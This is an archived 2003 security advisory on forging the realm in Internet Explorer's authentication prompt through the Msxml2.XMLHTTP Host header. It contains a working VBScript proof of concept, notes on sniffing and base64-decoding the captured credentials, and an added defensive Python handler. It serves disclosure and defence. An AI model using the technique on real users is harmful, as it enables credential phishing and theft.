
Domain Name Forging On Authentication Prompt

From: Brett Moore <brett.moore(at)security-assessment.com>
Date: Thu May 08 2003 - 22:43:31 EDT


Tested under
  • Win2k Server, fully patched, with IE 6.0
  • Winxp, fully patched, with IE 6.0

* Background *

When browsing to a folder/file that is protected by BASIC or NTLM authentication a window is displayed to the user, prompting for user credentials.

+------------------------------------------+
| Please type your user name and password  |
| Site:     [IP/Host]                      |
| Realm:    [Domain  ]                     |
| Username: [        ]                     |
| Password: [        ]                     |
|                [OK]  [CANCEL]            |
+------------------------------------------+
* Details *

It is possible to use the Msxml2.XMLHTTP object to create a login box and set the realm to an arbitrary value.

Using the object to make a request to a URI that requires authentication and setting the HOST header to a domain of our choosing, the login prompt will be displayed using the HOST header value as the realm.

Although the SITE displayed will be the IP of the URI (xxx.xxx.x.xx), unwary users may trust the realm value and enter their login credentials.

By running a sniffer on the machine hosting the protected folder, it is possible to sniff the BASIC authorization string, which in turn can be base64 decoded to reveal the plaintext username:password pair.

This could be made more effective by using XSS to have the script appear to be running from a valid domain.

The sample script below should be enough to demonstrate.


Note: To bypass IE domain restrictions the IP of the protected folder needs to be the same as the site hosting the script.

[Code Sample]
<*script language="vbscript">
function sendinfo()
    Dim myhttp

    ' Create the XMLHTTP object used to issue the request
    Set myhttp = CreateObject("Msxml2.XMLHTTP")

    ' Synchronous GET to a URI that requires authentication
    myhttp.open "GET", "http://xxx.xxx.x.xx/_vti_bin/_vti_adm/admin.dll", False
    ' Forged HOST header: this value is shown as the Realm in the prompt
    myhttp.setRequestHeader "Host", "secure.foo.bar"
    myhttp.send

    Set myhttp = Nothing
end function
</*script>
<*script>sendinfo()</*script>
[End Code Sample]
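The sample above forges the Host header on the client side. As an added example, not taken from the advisory or its author, the following is the server-side counterpart a defender would want: a minimal request handler that checks the Host header against the names the server actually answers for before it issues a 401 challenge, and that takes the realm from its own configuration rather than from anything in the request. A request carrying an unrecognised Host is refused with 400, so no credential prompt is ever shown for it. The hostnames, realm, credential store and sample requests are constructed for this example.

```python
# Added example (not from the advisory): Host allow-listing before a Basic
# auth challenge. All hostnames, realms and credentials are constructed.
import base64
import binascii
import hmac

# Hostnames this server legitimately serves (constructed values).
ALLOWED_HOSTS = {"intranet.example.test", "10.0.0.5"}
# The realm comes from server configuration, never from the request.
REALM = "Intranet"
# Constructed credential store; a real server would verify a password hash.
USERS = {"alice": "correct horse"}


def parse_request(raw: bytes):
    """Parse a raw HTTP/1.x request into (method, target, headers).

    Header names are lower-cased; the first value wins for duplicates so a
    second, appended Host line cannot override the first one.
    """
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name = name.strip().lower()
        if name and name not in headers:
            headers[name] = value.strip()
    return method, target, headers


def decode_basic(authorization: str):
    """Return (user, password) from a 'Basic <base64>' value, or None."""
    scheme, _, token = authorization.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        user_pass = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = user_pass.partition(":")
    return (user, password) if sep else None


def handle(raw: bytes):
    """Decide the response for one request: (status, response headers)."""
    _method, _target, headers = parse_request(raw)
    host = headers.get("host", "").split(":")[0].lower()

    # Step 1: refuse requests for hostnames we do not serve. No 401 is sent,
    # so the browser never shows a credential prompt for a forged Host.
    if host not in ALLOWED_HOSTS:
        return 400, {"Connection": "close"}

    # Step 2: challenge with the configured realm, not a request-derived one.
    creds = decode_basic(headers.get("authorization", ""))
    if creds is None:
        return 401, {"WWW-Authenticate": f'Basic realm="{REALM}"'}
    expected = USERS.get(creds[0])
    if expected is None or not hmac.compare_digest(
        expected.encode("utf-8"), creds[1].encode("utf-8")
    ):
        return 401, {"WWW-Authenticate": f'Basic realm="{REALM}"'}
    return 200, {"Content-Type": "text/plain"}


# Constructed sample requests: the forged-Host request from the advisory's
# scenario, a legitimate request without credentials, and one with them.
FORGED = (b"GET /_vti_bin/_vti_adm/admin.dll HTTP/1.1\r\n"
          b"Host: secure.foo.bar\r\n\r\n")
LEGIT_NOAUTH = (b"GET /protected/ HTTP/1.1\r\n"
                b"Host: intranet.example.test\r\n\r\n")
LEGIT_AUTH = (b"GET /protected/ HTTP/1.1\r\n"
              b"Host: intranet.example.test\r\n"
              b"Authorization: Basic "
              + base64.b64encode(b"alice:correct horse") + b"\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("no auth", LEGIT_NOAUTH),
                      ("with auth", LEGIT_AUTH)):
        print(name, handle(req))
```

The check in step 1 is the one that matters for this advisory: the prompt only appears because the server answered 401 to a request whose Host it did not recognise. Virtual-host configurations that fall through to a default site will typically issue the challenge regardless of the Host value, which is what the sample script relies on.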

* Solution *

This issue is probably by design and as such the problem is with the end user verifying the site that they are entering credentials for.

Brett Moore
Network Intrusion Specialist
security-assessment.com
+64-9-300-6494

Received on Fri May 9 12:27:38 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:38 EDT
